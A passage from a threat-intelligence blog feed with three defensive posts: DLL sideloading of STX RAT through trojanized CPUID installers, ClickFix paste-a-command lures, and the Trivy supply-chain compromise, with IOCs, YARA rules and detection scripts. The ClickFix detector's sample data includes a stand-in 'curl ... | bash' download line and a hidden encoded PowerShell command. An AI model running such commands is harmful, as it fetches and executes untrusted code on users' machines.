<h3>STX RAT Execution via DLL Sideloading</h3>
<p>The redirected download links provided users with what appeared to be standard installers for CPU-Z or HWMonitor. However, these installers were trojanized. The primary mechanism for infection was <strong>DLL Sideloading (MITRE ATT&amp;CK T1574.002)</strong>.</p>
<p>The malicious package included a legitimate, signed application alongside a rogue DLL named <code>CRYPTBASE.dll</code>. When the legitimate executable is launched, it attempts to load the necessary <code>CRYPTBASE.dll</code> from its local directory before searching system folders. The malicious version of the DLL contained the STX RAT payload and was responsible for:</p>
<ol>
<li><p><strong>Anti-Analysis Checks:</strong> The DLL performed checks to determine if it was running in a sandbox or virtualized environment.</p>
</li>
<li><p><strong>Persistence:</strong> Establishing hooks into the system to ensure the RAT survived reboots.</p>
</li>
<li><p><strong>C2 Communication:</strong> Connecting back to attacker-controlled infrastructure to receive commands.</p>
</li>
</ol>
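<p>As an added example (not code from the original post or from CPUID), the following Python triages constructed Sysmon-style image-load records for the sideloading pattern described above: a DLL that Windows should resolve from a system directory, here <code>CRYPTBASE.dll</code>, being loaded from the directory of a downloaded installer instead. The event records, user name and installer file names are constructed for illustration; only the DLL name comes from the post. It also serves the "Monitor for DLL Sideloading" recommendation at the end of this post.</p>

```python
"""Triage image-load telemetry for DLL sideloading (T1574.002).

Added example, not code from the original post. The records below mimic the
fields of Sysmon Event ID 7 (ImageLoad) and are constructed for illustration.
The rule: a DLL that Windows normally resolves from a system directory
(CRYPTBASE.dll in the CPUID campaign) loaded from anywhere else is suspect,
because the loader searched the application's own directory first.
"""
from pathlib import PureWindowsPath

# DLL names that legitimately live in System32; a copy next to an installer
# in Downloads or %TEMP% is the sideloading pattern. Extend as needed.
SYSTEM_DLLS = {"cryptbase.dll"}

# Directories from which those DLLs are expected to load.
SYSTEM_DIRS = (
    PureWindowsPath(r"C:\Windows\System32"),
    PureWindowsPath(r"C:\Windows\SysWOW64"),
    PureWindowsPath(r"C:\Windows\WinSxS"),
)


def is_under(path: PureWindowsPath, root: PureWindowsPath) -> bool:
    """Case-insensitive check that `path` lies inside `root`."""
    parts = [p.lower() for p in path.parts]
    base = [p.lower() for p in root.parts]
    return parts[:len(base)] == base


def is_sideload(event: dict) -> bool:
    """True when a system DLL name is loaded from a non-system directory."""
    loaded = PureWindowsPath(event["ImageLoaded"])
    if loaded.name.lower() not in SYSTEM_DLLS:
        return False
    return not any(is_under(loaded, d) for d in SYSTEM_DIRS)


def triage(events: list) -> list:
    """Return the (Image, ImageLoaded) pairs worth an analyst's attention."""
    return [(e["Image"], e["ImageLoaded"]) for e in events if is_sideload(e)]


# Constructed sample records: one benign system load, two sideload candidates
# mimicking a trojanized installer, one unrelated application DLL.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\cryptbase.dll"},
    {"Image": r"C:\Users\alice\Downloads\cpuz_setup.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\CRYPTBASE.dll"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\hwmonitor_setup.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\CRYPTBASE.dll"},
    {"Image": r"C:\Program Files\Foo\foo.exe",
     "ImageLoaded": r"C:\Program Files\Foo\foo.dll"},
]

if __name__ == "__main__":
    for image, dll in triage(SAMPLE_EVENTS):
        print(f"SIDELOAD? {image} loaded {dll}")
```

<p>The check is deliberately name-based rather than hash-based: a rebuilt rogue DLL changes its hash but still has to carry the name the legitimate executable asks for, so the location of the load is the stable signal. Pair it with the YARA rules later in this post for file-level confirmation.</p>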
<h3>Infrastructure Reuse</h3>
<p>A notable finding in this campaign is the reuse of infrastructure. The C2 addresses and distribution patterns identified in this attack overlap significantly with previous campaigns distributing fake FileZilla installers. This suggests that the threat actor behind this campaign is either part of an established cybercrime syndicate or is utilizing a "malware-as-a-service" (MaaS) kit that includes pre-configured infrastructure.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique ID</th>
<th>Technique Name</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1189</td>
<td>Drive-by Compromise (Watering Hole)</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1204.002</td>
<td>User Execution: Malicious File</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>T1574.002</td>
<td>Hijack Execution Flow: DLL Side-Loading</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1497.001</td>
<td>Virtualization/Sandbox Evasion</td>
</tr>
<tr>
<td><strong>Command and Control</strong></td>
<td>T1071.001</td>
<td>Web Service: Application Layer Protocol</td>
</tr>
<tr>
<td><strong>Command and Control</strong></td>
<td>T1219</td>
<td>Remote Access Software</td>
</tr>
</tbody></table>
<h2>SecLookup Detection</h2>
<p>SecLookup’s proactive threat hunting engine identified the malicious nature of the redirect domains shortly after the campaign began. Our platform confirmed that <code>cahayailmukreatif.web.id</code> was associated with malware distribution.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Domains</h3>
<pre><code class="language-text">cahayailmukreatif.web.id
vatrobran.hr
transitopalermo.com
pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev
</code></pre>
<h3>File Hashes (MD5/ID)</h3>
<pre><code class="language-text">45c2577dbd174292a02137c18e7b1b5a
</code></pre>
<h2>Detection Rules</h2>
<h3>YARA Rules</h3>
<p>The following rules can be used to scan for the malicious DLL and trojanized installers within your environment.</p>
<pre><code class="language-yara">rule STX_RAT_CPUID_Malicious_DLL {
    meta:
        description = "Detects malicious CRYPTBASE.dll used in the CPUID watering hole attack to sideload STX RAT"
        author = "Threat Intel Analysis"
        date = "2024-05-22"
        reference = "CPUID Watering Hole Attack"
    strings:
        $dll_name = "CRYPTBASE.dll" ascii wide
        $domain1 = "vatrobran.hr" ascii wide
        $domain2 = "cahayailmukreatif.web.id" ascii wide
        $domain3 = "transitopalermo.com" ascii wide
        $domain4 = "pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev" ascii wide
    condition:
        uint16(0) == 0x5A4D and ($dll_name and 1 of ($domain*))
}

rule CPUID_Trojanized_Installer_Indicators {
    meta:
        description = "Detects strings related to trojanized CPU-Z or HWMonitor installers used in STX RAT campaign"
    strings:
        $s1 = "CPU-Z" ascii wide
        $s2 = "HWMonitor" ascii wide
        $s3 = "CPUID" ascii wide
        $m1 = "CRYPTBASE.dll" ascii wide
        $m2 = "vatrobran.hr" ascii wide
    condition:
        uint16(0) == 0x5A4D and (1 of ($s*) and 1 of ($m*))
}
</code></pre>
<h2>Recommendations</h2>
<p>To mitigate the risk posed by this and similar watering hole attacks, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Verify Software Signatures:</strong> Always check the digital signature of downloaded executables. In this campaign, while the legitimate CPUID files were signed, the trojanized installers often lacked valid signatures or were signed by unrelated third parties.</p>
</li>
<li><p><strong>Monitor for DLL Sideloading:</strong> Implement endpoint monitoring (EDR) to alert on unusual DLL loads, particularly <code>CRYPTBASE.dll</code> appearing in non-system directories like <code>Downloads</code> or <code>AppData\Local\Temp</code>.</p>
</li>
<li><p><strong>Application Whitelisting:</strong> Restrict the execution of administrative tools to authorized personnel and ensure they are sourced from internal, verified repositories rather than direct web downloads.</p>
</li>
<li><p><strong>Network Filtering:</strong> Ensure your DNS and web proxy solutions are ingesting real-time threat intelligence feeds from SecLookup to block access to newly registered or compromised domains used in malware campaigns.</p>
</li>
<li><p><strong>User Education:</strong> Remind employees and IT staff that even trusted sites can be compromised and to report any unusual behavior (e.g., unexpected redirects or certificate errors) during software downloads.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://securityaffairs.com/190702/malware/cpuid-watering-hole-attack-spreads-stx-rat-malware.html">CPUID watering hole attack spreads STX RAT malware</a> by Pierluigi Paganini, Security Affairs</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[ClickFix Evolution: Cross-Platform Social Engineering Targeting Enterprise Workflows]]></title><description><![CDATA[Executive Summary
The threat landscape is witnessing a sophisticated shift in initial access delivery through a social engineering technique known as "ClickFix." Recent investigations into campaign cl]]></description><link>https://blog.seclookup.com/clickfix-evolution-cross-platform-social-engineering-targeting-enterprise-workflows</link><guid isPermaLink="true">https://blog.seclookup.com/clickfix-evolution-cross-platform-social-engineering-targeting-enterprise-workflows</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 26 Mar 2026 08:35:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/942c03cd-3b24-403e-9afc-905697004a71.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>The threat landscape is witnessing a sophisticated shift in initial access delivery through a social engineering technique known as "ClickFix." Recent investigations into campaign clusters active since May 2024 reveal a highly effective methodology designed to bypass traditional browser security controls and endpoint detection. By impersonating trusted platforms like Intuit QuickBooks and Booking.com, threat actors are tricking users into executing malicious, obfuscated commands directly within native system tools such as the Windows Run dialog box and the macOS Terminal. This "Living-off-the-Land" (LotL) approach represents a significant evolution in cross-platform targeting, moving beyond simple credential harvesting to direct system compromise. SecLookup has been actively monitoring these developments, and our threat intelligence platform has successfully identified and blocked the infrastructure associated with these multi-stage attacks.</p>
<h2>Threat Analysis: The Mechanics of ClickFix</h2>
<p>The ClickFix technique relies on a fundamental psychological exploit: the "fix-it" reflex. When a user encounters a purported technical error—such as a failed document load, a browser incompatibility, or a security certificate issue—they are primed to follow instructions to resolve the problem.</p>
<h3>Technical Workflow and TTPs</h3>
<p>The attack sequence typically begins with a compromised website or a dedicated malicious domain that serves a convincing lure. Insikt Group’s analysis highlights five distinct clusters of activity, showing that while the lures vary, the core mechanism remains consistent.</p>
<ol>
<li><strong>Infrastructure and Lures:</strong> Attackers deploy domains that mimic support or help desks (e.g., <code>account-help.info</code>). These sites often use lures relevant to high-value targets in accounting, legal services, and real estate. A prominent example includes fake Intuit QuickBooks update pages or Booking.com notification errors.</li>
<li><strong>OS Detection and Delivery:</strong> The malicious landing pages employ technical sophistication by fingerprinting the visitor's operating system. This allows the campaign to serve tailored execution chains. If a Windows user is detected, the site provides a "fix" involving the Windows Run dialog. If a macOS user is detected, the instructions pivot to the macOS Terminal.</li>
<li><strong>The "ClickFix" Interaction:</strong> Instead of a traditional file download (which might be flagged by the browser or EDR), the user is prompted to click a button to "copy the fix" to their clipboard. This "fix" is actually a heavily obfuscated PowerShell command (for Windows) or an AppleScript/Bash command (for macOS).</li>
<li><strong>User-Driven Execution:</strong> The site provides step-by-step visual instructions:<ul>
<li><strong>Windows:</strong> Press <code>Win + R</code>, paste the clipboard content (<code>Ctrl + V</code>), and hit <code>Enter</code>.</li>
<li><strong>macOS:</strong> Open Terminal, paste the content (<code>Cmd + V</code>), and hit <code>Enter</code>.</li>
</ul>
</li>
<li><strong>Bypassing Defense:</strong> Because the command is executed directly by the user through a native OS utility, it bypasses many browser-based security sandboxes. The execution occurs in-memory, minimizing the disk footprint and evading traditional signature-based antivirus solutions.</li>
</ol>
<h3>MITRE ATT&amp;CK Mapping</h3>
<p>The ClickFix campaigns utilize several tactics and techniques within the MITRE ATT&amp;CK framework:</p>
<ul>
<li><strong>Initial Access:</strong> Phishing (T1566) and Drive-by Compromise (T1189).</li>
<li><strong>Execution:</strong> User Execution: Malicious Command (T1204.001), Command and Scripting Interpreter: PowerShell (T1059.001), and Command and Scripting Interpreter: AppleScript (T1059.002).</li>
<li><strong>Defense Evasion:</strong> Obfuscated Files or Information (T1027) and Living-off-the-Land (T1218).</li>
</ul>
<h2>SecLookup Detection and Global Intelligence</h2>
<p>SecLookup’s threat intelligence engine has been tracking the infrastructure associated with ClickFix clusters since their emergence. Our platform utilizes advanced HTML content analysis and behavioral heuristic modeling to identify malicious web artifacts before they are widely reported.</p>
<p>During the lifecycle of these campaigns, <strong>SecLookup was actively detecting and blocking the malicious domains</strong> used in the redirection chains and payload hosting. By correlating IP addresses and domain registration patterns, SecLookup provided real-time protection to our users, neutralizing the social engineering lures before they could facilitate host-level compromise. Our telemetry consistently flagged the infrastructure used in the QuickBooks and Booking.com impersonation clusters as high-risk, enabling SOC teams to proactively harden their environments.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>The following indicators have been identified across the various ClickFix clusters. We recommend that organizations ingest these into their SIEM and EDR platforms for immediate blocking and hunting.</p>
<h3>Confirmed Malicious Domains</h3>
<pre><code class="language-text">account-help.info
account-helpdesk.icu
account-helpdesk.top
macxapp.org
mrinmay.net
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">62.164.177.230
94.156.112.115
193.222.99.212
45.144.233.192
77.91.65.31
193.58.122.97
45.93.20.141
77.91.65.144
152.89.244.70
193.35.17.12
45.93.20.50
91.202.233.206
87.236.16.20
</code></pre>
<h3>File Hashes (SHA-256)</h3>
<pre><code class="language-text">c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50
43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87
397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8
b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c
5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db
</code></pre>
<h2>Recommendations for Defense</h2>
<p>While indicator blocking is essential, the transition of ClickFix into a standardized template for both cybercriminals and APTs necessitates a strategy centered on behavioral hardening.</p>
<h3>Technical Hardening</h3>
<ol>
<li><strong>Restrict System Utilities:</strong> For Windows environments, evaluate the necessity of the Run dialog box. If it is not required for daily business operations, it can be disabled via Group Policy Objects (GPO).</li>
<li><strong>PowerShell Security:</strong> Implement PowerShell Constrained Language Mode (CLM) to limit the capability of malicious scripts. Ensure that PowerShell logging (Script Block Logging and Transcription) is enabled and forwarded to a centralized SIEM for analysis.</li>
<li><strong>Terminal Restrictions:</strong> For macOS, utilize Mobile Device Management (MDM) solutions to restrict or monitor the execution of unsigned scripts within the Terminal.</li>
<li><strong>Clipboard Monitoring:</strong> While challenging to implement at scale, advanced EDR solutions can be configured to alert on unusual patterns of content being pasted into system shells, especially when originating from browser processes.</li>
</ol>
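<p>As an added example (not code from the original report or from Recorded Future), the following Python applies the hardening guidance above to process-creation telemetry: it flags an interpreter spawned directly from the desktop shell (the parent that a Windows Run dialog launch produces) or from the macOS Terminal whose command line carries the hallmarks of a pasted "fix", such as a hidden window, an encoded command, or a download piped into a shell. The event records and command lines are constructed for illustration and carry no real payload.</p>

```python
"""Flag ClickFix-style interpreter launches in process-creation telemetry.

Added example, not code from the original report. Records mimic the fields of
Sysmon Event ID 1 / EDR process events and are constructed; the encoded
command is the base64 of the word "Placeholder". The heuristic pairs an
unusual parent (explorer.exe for a Run-dialog launch, Terminal on macOS)
with command-line markers typical of a pasted one-liner.
"""
import re
from pathlib import PurePath

# Markers seen in pasted one-liners; each match is one reason to flag.
MARKERS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\b", re.I),
    "in-memory execution": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote fetch": re.compile(r"https?://", re.I),
    "download piped to shell": re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b", re.I),
    "applescript": re.compile(r"\bosascript\b", re.I),
}

# Parent processes from which an interactive "paste this" launch originates.
RUN_DIALOG_PARENTS = {"explorer.exe"}
TERMINAL_PARENTS = {"terminal", "iterm2"}
WINDOWS_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
MAC_INTERPRETERS = {"bash", "sh", "zsh", "osascript"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return PurePath(path.replace("\\", "/")).name.lower()


def interactive_parent(event: dict) -> bool:
    """True when the parent/child pair matches a Run-dialog or Terminal launch."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent in RUN_DIALOG_PARENTS and image in WINDOWS_INTERPRETERS:
        return True
    return parent in TERMINAL_PARENTS and image in MAC_INTERPRETERS


def reasons_for(event: dict) -> list:
    """Names of the markers that the command line matches."""
    cmd = event["CommandLine"]
    return [name for name, rx in MARKERS.items() if rx.search(cmd)]


def flag_events(events: list) -> list:
    """Return (event_id, reasons) for launches that look like pasted fixes."""
    flagged = []
    for ev in events:
        reasons = reasons_for(ev)
        if interactive_parent(ev) and reasons:
            flagged.append((ev["id"], reasons))
    return flagged


# Constructed sample events: 1 and 4 are ClickFix-shaped, the rest are benign.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -NoProfile -enc UGxhY2Vob2xkZXI="},
    {"id": 2, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"id": 4, "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "Image": "/bin/bash",
     "CommandLine": 'bash -c "curl -fsSL https://example.invalid/fix.sh | bash"'},
    {"id": 5, "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "Image": "/bin/zsh",
     "CommandLine": "zsh -c ls -la"},
]

if __name__ == "__main__":
    for event_id, reasons in flag_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
```

<p>Event 3 shows why the parent check alone is too noisy: a user opening a console from the Start menu produces the same parent/child pair, so the rule only fires when a command-line marker is present as well. Tune the parent sets to your fleet (for example, add the Run-dialog host used by your shell replacement) before deploying.</p>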
<h3>User Awareness and Training</h3>
<p>Standard phishing simulations often focus on malicious attachments or links. Organizations should update their training modules to include:</p>
<ul>
<li><strong>Interaction-Based Social Engineering:</strong> Educate users that no legitimate software support (Microsoft, Intuit, Apple) will ever ask them to copy and paste code into a Command Prompt, PowerShell, or Terminal window to "fix" a browser error.</li>
<li><strong>Reporting Procedures:</strong> Streamline the process for users to report "weird" browser pop-ups, even if they didn't follow the instructions.</li>
</ul>
<h3>Proactive Intelligence</h3>
<p>Operationalize Digital Risk Protection (DRP) tools to monitor for domain registrations that typo-squat your brand or third-party vendors your organization relies upon. Early detection of look-alike domains can allow for preemptive blocking before a campaign reaches your users.</p>
<h2>References</h2>
<ul>
<li><a href="https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos">ClickFix Campaigns Targeting Windows and macOS</a> by Recorded Future, March 25, 2026.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Weaponizing the Watcher: Analyzing the TeamPCP Trivy Supply Chain Compromise]]></title><description><![CDATA[Executive Summary
On March 19, 2026, a highly sophisticated CI/CD-focused supply chain attack targeted Trivy, the widely adopted open-source vulnerability scanner maintained by Aqua Security. Attribut]]></description><link>https://blog.seclookup.com/weaponizing-the-watcher-analyzing-the-teampcp-trivy-supply-chain-compromise</link><guid isPermaLink="true">https://blog.seclookup.com/weaponizing-the-watcher-analyzing-the-teampcp-trivy-supply-chain-compromise</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 26 Mar 2026 08:34:03 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/846e0cd4-e727-4c8c-b94d-ce37c68d95df.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>On March 19, 2026, a highly sophisticated CI/CD-focused supply chain attack targeted Trivy, the widely adopted open-source vulnerability scanner maintained by Aqua Security. Attributed to the threat actor known as <strong>TeamPCP</strong>, the campaign leveraged compromised credentials from a previously under-remediated incident to inject malicious code into official distribution channels. By poisoning GitHub Actions and publishing weaponized binaries, the attackers successfully turned a trusted security tool into a vehicle for credential theft and persistence. This incident highlights the critical vulnerability of modern DevOps pipelines, where a single point of failure in a trusted dependency can lead to widespread organizational compromise. <strong>SecLookup was actively detecting and blocking the infrastructure associated with this threat prior to the public disclosure.</strong></p>
<h2>Threat Analysis</h2>
<p>The TeamPCP campaign represents a calculated execution phase of a long-term operation. Rather than attempting to breach thousands of organizations individually, the actors compromised the tooling those organizations use to secure themselves. This "watering hole" approach in the CI/CD space is particularly effective because security scanners like Trivy often run with elevated permissions to access container registries, source code, and cloud environments.</p>
<h3>TTPs: CI/CD Pipeline Poisoning</h3>
<p>The primary vector for this compromise involved the manipulation of GitHub Actions. TeamPCP gained access to credentials with tag write permissions for the <code>aquasecurity/trivy-action</code> and <code>aquasecurity/setup-trivy</code> repositories.</p>
<p>The attackers utilized a "force-push" technique against existing version tags. In GitHub Actions, many developers reference versions using tags (e.g., <code>uses: aquasecurity/trivy-action@v1</code>). By force-pushing 76 of 77 version tags, TeamPCP redirected these trusted references to malicious commits containing their payload. Because the version number remained unchanged, downstream workflows automatically pulled the malicious code without triggering any alerts or requiring manual updates from the end-user.</p>
<h3>Malicious Binary Distribution</h3>
<p>Simultaneously, the actors weaponized the release automation process. They triggered the publication of a malicious Trivy binary, specifically version <strong>v0.69.4</strong>. This version was distributed through official GitHub Releases and container registries. The infected binary contained a credential-stealing module designed to intercept:</p>
<ul>
<li><p>Cloud provider credentials (AWS, Azure, GCP)</p>
</li>
<li><p>GitHub Personal Access Tokens (PATs)</p>
</li>
<li><p>Environment variables stored in CI/CD secrets</p>
</li>
<li><p>Container registry authentication tokens</p>
</li>
</ul>
<h3>Infrastructure and Typosquatting</h3>
<p>To facilitate Command and Control (C2) and exfiltration, TeamPCP deployed a combination of typosquatted domains and decentralized infrastructure. The domain <code>aquasecurtiy.org</code> (note the transposed 'i' and 't') was used to mimic official communication channels and host malicious scripts.</p>
<p>Furthermore, the actors utilized the Internet Computer Protocol (ICP) to host C2 endpoints, as seen with the domain <code>tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io</code>. Using decentralized hosting makes it significantly harder for traditional security controls to take down the infrastructure, providing the actors with increased resilience.</p>
<h3>Expansion to Other Frameworks</h3>
<p>Initial investigation by the Microsoft Defender Security Research Team suggests that TeamPCP has expanded this campaign beyond Trivy. Indicators of similar activity have been detected involving <strong>Checkmarx KICS</strong> and <strong>LiteLLM</strong>. This suggests a broader strategy targeting the "Security as Code" and "AI Orchestration" layers of the modern tech stack.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<p>The techniques observed in this campaign map to the following MITRE ATT&amp;CK framework categories:</p>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>Supply Chain Compromise: Compromise Software Supply Chain</td>
<td>T1195.002</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>Command and Scripting Interpreter: Bash/PowerShell</td>
<td>T1059</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>Create or Modify System Process: Systemd Service</td>
<td>T1543.002</td>
</tr>
<tr>
<td><strong>Credential Access</strong></td>
<td>Unsecured Credentials: Credentials In Files / Environment Variables</td>
<td>T1552</td>
</tr>
<tr>
<td><strong>Command and Control</strong></td>
<td>Application Layer Protocol: Web Protocols</td>
<td>T1071.001</td>
</tr>
<tr>
<td><strong>Resource Development</strong></td>
<td>Acquire Infrastructure: Domains</td>
<td>T1583.001</td>
</tr>
</tbody></table>
<h2>SecLookup Detection</h2>
<p>The SecLookup threat intelligence platform was actively monitoring the infrastructure used in this campaign. Our proprietary scanning engines identified the typosquatted <code>aquasecurtiy.org</code> domain and its subdomains shortly after registration. Furthermore, our behavioral analysis systems flagged the anomalous ICP-based C2 infrastructure as high-risk.</p>
<p>SecLookup customers were protected through domain classification: the malicious domains were flagged as "Malicious" in our database, enabling automated blocking at the firewall and DNS levels.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Domains</h3>
<pre><code class="language-text">aquasecurtiy.org
scan.aquasecurtiy.org
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">45.148.10.122
45.148.10.212
169.254.169.254  # Link-local used for IMDS credential exfiltration
169.254.170.2    # ECS Metadata endpoint targeting
</code></pre>
<h3>Detection Rules (YARA)</h3>
<p>The following YARA rules can be used to scan for the presence of the TeamPCP infection within your environment or CI/CD logs.</p>
<pre><code class="language-yara">rule INDICATOR_SUSP_Trivy_Typosquat_Domain {
    meta:
        description = "Detects the typosquatted domain aquasecurtiy.org used in the TeamPCP Trivy supply chain attack"
        author = "SecLookup Threat Research"
        date = "2026-03-25"
        reference = "Trivy Supply Chain Compromise March 2026"
    strings:
        $typo1 = "aquasecurtiy.org" ascii wide
        $typo2 = "scan.aquasecurtiy.org" ascii wide
        $proper = "aquasecurity.org" ascii wide
    condition:
        ($typo1 or $typo2) and not $proper
}

rule MALW_TeamPCP_Trivy_Infection_Indicators {
    meta:
        description = "Detects indicators of the TeamPCP malware injection in Trivy binaries and CI/CD configs"
        author = "SecLookup Threat Research"
    strings:
        $c2_icp = "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io" ascii wide
        $actor = "TeamPCP" ascii wide
        $ver = "v0.69.4" ascii wide
        $action1 = "aquasecurity/trivy-action" ascii wide
        $action2 = "aquasecurity/setup-trivy" ascii wide
    condition:
        $c2_icp or ($actor and ($action1 or $action2 or $ver))
}
</code></pre>
<h2>Recommendations</h2>
<p>To mitigate the risk posed by the Trivy supply chain compromise and similar CI/CD attacks, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Pin GitHub Actions to Full Commit SHAs:</strong> Avoid using tags like <code>@v1</code> or <code>@v0.69.4</code>. Instead, use the immutable commit SHA (e.g., <code>aquasecurity/trivy-action@646b15099e...</code>). This prevents "tag-shifting" attacks.</p>
</li>
<li><p><strong>Audit CI/CD Permissions:</strong> Implement the principle of least privilege for GitHub Actions. Use the <code>permissions:</code> key in your YAML files to restrict <code>GITHUB_TOKEN</code> access to <code>read-only</code> where possible.</p>
</li>
<li><p><strong>Rotate Secrets:</strong> If you have used Trivy version v0.69.4 or the affected GitHub Actions between March 19 and March 25, 2026, assume your CI/CD secrets (AWS keys, PATs, etc.) are compromised and rotate them immediately.</p>
</li>
<li><p><strong>Update Tooling:</strong> Ensure you are using the latest patched versions of Trivy. Aqua Security has released remediated versions following the incident.</p>
</li>
<li><p><strong>Monitor Metadata Access:</strong> Monitor for unusual requests to <code>169.254.169.254</code> or <code>169.254.170.2</code> originating from CI/CD runners, which may indicate an attempt to steal cloud identity credentials.</p>
</li>
</ol>
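<p>One way to operationalize the first recommendation, as an added example that is not part of the original post or of any Aqua Security tooling: a small Python checker that walks a GitHub Actions workflow and reports every <code>uses:</code> reference that points at a mutable tag or branch rather than a full 40-character commit SHA. The workflow text and the all-zero SHA are constructed placeholders, not real commits.</p>

```python
"""Report GitHub Actions references that are not pinned to a commit SHA.

Added example, not project code. A tag such as @v1 can be force-pushed to a
different commit (the tag-shifting seen in the Trivy incident); a 40-hex
commit SHA cannot be silently redirected. The checker is a line-based scan so
it needs no YAML library; it understands 'uses:' in steps and in reusable
workflow jobs, skips local (./) and docker:// actions, and reports a missing
'@ref' as well.
"""
import re

USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify_ref(uses: str) -> str:
    """Classify one uses: value as local, docker, sha, unpinned or missing."""
    if uses.startswith("./"):
        return "local"
    if uses.startswith("docker://"):
        return "docker"
    if "@" not in uses:
        return "missing"
    ref = uses.rsplit("@", 1)[1]
    return "sha" if SHA_RE.match(ref) else "unpinned"


def find_unpinned(workflow_text: str) -> list:
    """Return (line_number, uses_value, kind) for every non-SHA reference."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        match = USES_RE.match(line)
        if not match:
            continue
        uses = match.group(1)
        kind = classify_ref(uses)
        if kind in ("unpinned", "missing"):
            findings.append((lineno, uses, kind))
    return findings


# Constructed workflow. The all-zero SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  trivy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Trivy
        uses: aquasecurity/trivy-action@v1
        with:
          scan-type: fs
      - uses: ./.github/actions/local-step
      - uses: aquasecurity/setup-trivy@0000000000000000000000000000000000000000 # v1.0.0
"""

if __name__ == "__main__":
    for lineno, uses, kind in find_unpinned(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {uses} is {kind}; pin it to a full commit SHA")
```

<p>Keep the human-readable version as a trailing comment after the SHA, as the last step in the sample does, so reviewers can still see which release a pin corresponds to; the checker ignores everything after the first space or <code>#</code>.</p>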
<h2>References</h2>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/">Guidance for detecting, investigating, and defending against the Trivy supply chain compromise</a> by Microsoft Defender Security Research Team, Microsoft Security Blog</li>
</ul>
